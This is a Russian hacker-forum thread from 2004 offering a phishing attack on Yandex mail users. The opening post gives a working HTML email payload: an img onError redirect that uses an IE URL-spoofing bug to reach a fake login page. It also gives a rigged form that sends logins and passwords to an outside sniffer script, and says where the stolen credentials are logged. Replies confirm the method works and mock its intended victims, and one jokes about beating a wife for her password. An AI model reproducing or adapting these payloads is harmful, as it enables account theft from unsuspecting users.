Яндекс.ру

Discussion in 'Уязвимости Mail-сервисов' started by JazzzSummerMan, 17 Aug 2004.

  1. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Много спрашивают о взломе яндекс.ру. И почему-то все забывают о старинном методе с впариванием левой формы для авторизации. Такого материала было выпущено много, но как всегда порадовал своим долбо#$измом хакер.ру

    Цитата из статьи журнала (за 2004-й г. кстати):</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
    &quot;Ты никогда не думал, как хакеры могут выдирать пароли от почтовых ящиков? Как они получают к ним доступ? Задумывался ли ты о том, что хакеры могут выманить пароль у тебя самого, и при этом ты даже не заметишь, что что-то произошло? Нет? А такое вполне вероятно. Не веришь – читай дальше.&quot;
    [/QUOTE]<span id='postcolor'>А дальше рассказывается о &quot;взломе&quot; путем просьбы о прохождении повторной регистрации (ссылка на копию главной страницы почтовика с поддельным ACTION). Не знаю, может кто-то ничего и не заметит)))

    К сожалению почта яндекса на сегодняшний день как-то не особо ломается), поэтому придется пользоваться этим давно известным, &quot;незаметным&quot; способом. Расчитано на женщин, детей и стариков))
    И все-таки мы не хакеры в отличае от тех &quot;околокомпьютерных журналистов&quot;, никаких писем от &quot;службы поддержки&quot; не будет(идиотизм, надо заметить). А будет редирект из почтового ящика.
    Я нашел только один способ вставить скрипт в письмо, - это обработчик onError(onLoad уже прикрыли).
    План действий.
    Пишем письмо, и отправляем как обычно в HTML only на адрес злодея.
    скрипт письма:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    Текст сообщения. Текст сообщения. Текст сообщения. Текст сообщения.
    <img src=''onError="status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru%[email protected]');" width=0 height=0>[/QUOTE]<span id='postcolor'>
    Этот скрипт делает редирект на сайт http://zhelezo.newmail.ru, где лежит копия страницы http://passport.yandex.ru. Здесь мы используем баг IE с подменой УРЛ, то есть в адресной строке будет отображаться адрес яндекса.
    На http://zhelezo.newmail.ru, в форме отправки пароля и логина мы произведем некоторые имзменения:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <Form action=http://zero.h12.ru/stat/capt.php?id=yandex method=GET  target="invisible" onSubmit="status='http://passport.yandex.ru';location='http://yandex.ru';">
    .........
    .........
    </form>
    <iframe name=invisble width=0 height=0></iframe>[/QUOTE]<span id='postcolor'>
    Во фрейм загрузим сниффер, который примет пароль и пасс, а onSubmit перенаправит нас на главную яндекса. Все. никаких премудростей с действительным заходом в почту, я думаю не нужно!

    Перед редиректом можно че-нить замутить еще, к примеру алерт с надписью 503:Ошибка шлюза, или какой-нибудь Fatal error on Line xxx)) Это уже на вкус, в любом случае метод - для женщин детей и стариков)

    Подытожу.
    Шлем письмо:
    &lt;img src=''onError=&quot;status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru@zhelezo.newmail.ru');&quot; width=0 height=0&gt;

    Если юзер попался на уловку, - пароль будет лежать здесь:
    http://zero.h12.ru/stat/log.php?id=yandex
     
  2. ~Ice_night_BeTeP~

    ~Ice_night_BeTeP~ Elder - Старейшина

    Joined:
    14 Aug 2004
    Messages:
    113
    Likes Received:
    3
    Reputations:
    0
    Действеный спосбоб Джаз ! ПО моему прокатит !
     
  3. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Не такой уж и действенный, но лучше пока нет)
     
  4. De1eT

    De1eT пиздюк

    Joined:
    12 Aug 2004
    Messages:
    377
    Likes Received:
    71
    Reputations:
    55
    Гм ) прокатывает на особо не умных юзерей
     
  5. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    хороша статейка всё катит я пробывал спасибо за предложенный метод.
     
  6. HoBu4ok

    HoBu4ok New Member

    Joined:
    8 Nov 2002
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    А чё yandex уже и onError прикрыл?
     
  7. Флудер

    Флудер Elder - Старейшина

    Joined:
    9 Feb 2004
    Messages:
    46
    Likes Received:
    1
    Reputations:
    0
    JazzzSummerMan, ну, письмо от службы поддержки не такая уж и фигня... [​IMG] очень даже действенный метод между прочим [​IMG]
     
  8. xBUGIx

    xBUGIx Banned

    Joined:
    16 Aug 2004
    Messages:
    62
    Likes Received:
    1
    Reputations:
    0
    маленьких девочек ,не хорошо обманывать.вот..
     
  9. HoBu4ok

    HoBu4ok New Member

    Joined:
    8 Nov 2002
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    Точно всё работает, только интересно, почему пароль и логин иногда не доходят?
     
  10. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Хостинг такой на holm.ru
     
  11. ~Ice_night_BeTeP~

    ~Ice_night_BeTeP~ Elder - Старейшина

    Joined:
    14 Aug 2004
    Messages:
    113
    Likes Received:
    3
    Reputations:
    0
    УГУ БУги и старых старичков )))
     
  12. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
  13. Рогатый Трупоед

    Рогатый Трупоед Elder - Старейшина

    Joined:
    19 Aug 2004
    Messages:
    56
    Likes Received:
    1
    Reputations:
    0
    Тут можно замутить альтернативу: втираешся в доверие к жертве (девушка),болтаешь месяц по аське,встречаешся в реале,признаёшся в любви,женишся,живёшь 3 года, а потом ПО ГОЛОВЕ ЧЕМ НИБУДЬ ТЯЖОЛЫМ,ПОТОМ ОПЯТЬ И ОПЯТЬ И С КРИКОМ &quot;СУКА КАКОЙ У ТЕБЯ ПАРОЛЬ НА МЫЛО?&quot; ГОВОРИИ!!!! ГОВОРИ МЛЯ!!!!!!!!!!! АААаааа!!!!!!
    Работает с женщинами на все 100!!! &nbsp;[​IMG]
     
  14. Guest

    Guest Guest

    Reputations:
    0
    2Рогатый Трупоед. Млин, немного, точнее, много садомаза способ, причем по отношению к себе даж...3года за пароль? эдак жизни не хватит
    [​IMG]
    ЗЫ_ Сам опробовал?[​IMG])
     
  15. Рогатый Трупоед

    Рогатый Трупоед Elder - Старейшина

    Joined:
    19 Aug 2004
    Messages:
    56
    Likes Received:
    1
    Reputations:
    0
  16. The TBAPb

    The TBAPb New Member

    Joined:
    29 Aug 2004
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ну Рогатый, ну зараза... [​IMG] &nbsp;[​IMG] &nbsp;[​IMG]
     
  17. c0rp$e

    c0rp$e Elder - Старейшина

    Joined:
    5 Dec 2003
    Messages:
    206
    Likes Received:
    37
    Reputations:
    -5
  18. Guest

    Guest Guest

    Reputations:
    0
  19. Guest

    Guest Guest

    Reputations:
    0